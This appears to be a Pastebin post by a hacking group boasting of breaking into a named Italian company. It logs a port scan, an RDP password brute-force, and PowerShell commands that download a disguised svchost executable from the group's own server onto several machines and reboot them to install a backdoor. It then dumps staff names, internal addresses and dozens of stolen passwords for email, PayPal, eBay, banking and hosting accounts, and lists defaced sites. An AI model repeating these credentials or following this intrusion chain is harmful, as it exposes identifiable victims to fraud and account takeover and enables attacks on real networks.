Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _______ _____ _ _______
- |__ __| | __ \| | |__ __|
- | |_ _| |__) | | __ | | ___ __ _ _ __ ___
- | | | | | _ /| |/ / | |/ _ \/ _` | '_ ` _ \
- | | |_| | | \ \| < | | __/ (_| | | | | | |
- |_|\__,_|_| \_\_|\_\ |_|\___|\__,_|_| |_| |_|
- Website: turkhackarmy.org
- New target: nuovacosmo.dlinkddns.com
- --- PING 2.112.52.162 (2.112.52.162) 56(84) bytes of data. ---
- 64 bytes from 2.112.52.162: icmp_req=1 ttl=49 time=6.23 ms
- 64 bytes from 2.112.52.162: icmp_req=2 ttl=49 time=6.44 ms
- 64 bytes from 2.112.52.162: icmp_req=3 ttl=49 time=6.29 ms
- 64 bytes from 2.112.52.162: icmp_req=4 ttl=49 time=6.58 ms
- ./SWhois 2.112.52.162
- route: 2.112.0.0/15
- descr: INTERBUSINESS
- id: AS3269
- origin: ibs-resid.milano26.mil.seabone.net
- name: Nuova Cosmo S.r.l.
- organization: Nuova Cosmo S.r.l.
- address: Via Giuseppe di Vittorio, 17, Inzago Milano
- telephone: +00390295310298
- ./nmap -F -T5 -Pn -sS 2.112.52.162
- Host is up (0.016s latency).
- PORT STATE SERVICE
- 21/tcp open ftp
- 3389/tcp open RDP (Remote Desktop Microsoft)
- Nmap done: 1 IP address (1 host up) scanned in 9.17 seconds
- WOAH nice!
- ./rdp_bruteforce 2.112.52.162 administrator passwlist.txt
- [+]Starting!
- ...................................................Found! (5043 sec)
- [!][email protected] PWD='inzago2010' !
- [-]Finish.
- ./rdp_client Administrator:[email protected]
- Connecting..
- Connected.
- WTF? too easy :/
- There's a lot of pc with no-login shared directory..
- Network>
- DAVIDE \DOCUMENTI
- ELENA-PC \UTENTI \DOCUMENTI-ELE \DOWNLOADS \SCANSIONI
- SERVER2 \BANCHE \DOCUMENTI \C (DRIVE)
- SERVER \BACKUP \UTENTI
- ASSISTENZA \C (DRIVE) \D (DRIVE) \E (DRIVE)
- PIA-PC \
- DIREZIONE \CONDIVISA
- COMMERCIALE \DRIVE \DOCUMENTI
- OFFICINA \
- USER-PC \
- SEGRETERIA \C (DRIVE)
- PS C:\> Invoke-WebRequest http:\\netshare.turkhackarmy.org\elon\svchost_variant.exe -OutFile \\ASSISTENZA\WINDOWS\SYSTEM32\SVCHOST.EXE
- PS C:\> Invoke-WebRequest http:\\netshare.turkhackarmy.org\elon\svchost_variant.exe -OutFile \\SERVER2\WINDOWS\SYSTEM32\SVCHOST.EXE
- PS C:\> Invoke-WebRequest http:\\netshare.turkhackarmy.org\elon\svchost_variant.exe -OutFile \\SEGRETERIA\WINDOWS\SYSTEM32\SVCHOST.EXE
- PS C:\> shutdown -R -M \\ASSISTENZA -t 0
- PS C:\> shutdown -R -M \\SERVER2 -t 0
- PS C:\> shutdown -R -M \\SEGRETERIA -t 0
- Worked, backdoor installed.
- G0T R00T !
- Files and infos gained:
- Marcello Direzione 192.168.0.7 ollecram [email protected] ollecram
- Marcello Direzione 192.168.0.7 ollecram [email protected] work2009
- Marcello Direzione 192.168.0.7 ollecram [email protected] marcello54
- Matteo Assistenza 192.168.0.1 ingrid [email protected] work2009
- Carlo Segreteria 192.168.0.2 malto2006 [email protected] carlo86
- Pia Commerciale 192.168.0.3 no [email protected] work2011
- Davide Ordini 192.168.0.115 davide [email protected] ollecram
- Elena Server cagnolino [email protected] elena
- Francesco NC COMMERC 23122000 [email protected] fra nc2006
- Luisa NC CONTAB cassano2006 [email protected] inzago2010
- IP CAM expo 192.168.0.20 no
- Officina Officina 192.168.0.117 officina no officina
- EBAY nuovacosmo 2010work
- EBAY workservices work2009
- Username: [email protected] Password: workservices
- Paypal [email protected] 2010work
- [email protected] zh?9Eqx(?12!
- [email protected] zh?9Eqx(?12!
- [email protected] !qazmlp!
- [email protected] !qazmlp!
- [email protected] !qazmlp!
- [email protected] !qazmlp!
- [email protected] ollecram!
- [email protected] ollecram!
- [email protected] ollecram!
- [email protected] ollecram!
- [email protected] ollecram!
- [email protected] work2012
- 192.168.1.254 admin atlantis
- 192.168.1.110 admin workservices
- 192.168.1.109 admin workservices
- http://hosting.aruba.it/ [email protected] 0la47pqx31
- http://hosting.aruba.it/ [email protected] 73avb14hxwe
- http://it.adveovision.net/Login.aspx 5010120 schiavonepia work2012!
- http://www.esprinet.com/public/ 1602147001 work2012
- http://www.brevi.it/ CLI7088 03368170969
- http://www.techdata.it/Pages/Start.aspx 594274 2010work
- http://www.datamatic.it/private/home/ 946683 work2012!
- http://www.acquistinretepa.it/opencms/ SCHMRP000 Workservices2013
- https://signin.ebay.it/ws/eBayISAPI.dll nuovacosmo ymzx735qmgf
- https://signin.ebay.it/ws/eBayISAPI.dll workservices 2SrspkgsGZ
- https://www.paypal.com/it/cgi-bin/webscr [email protected] adgje!?thuk!qJ?
- https://ibbweb.tecmarket.it/ P2006371 JWB4G NCOSMO13
- There's a lot of password..
- Hacked www.nuovacosmo.it
- Hacked www.workservices.it
- Hacked www.studiomartesana.com
- [-]Attack finished.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement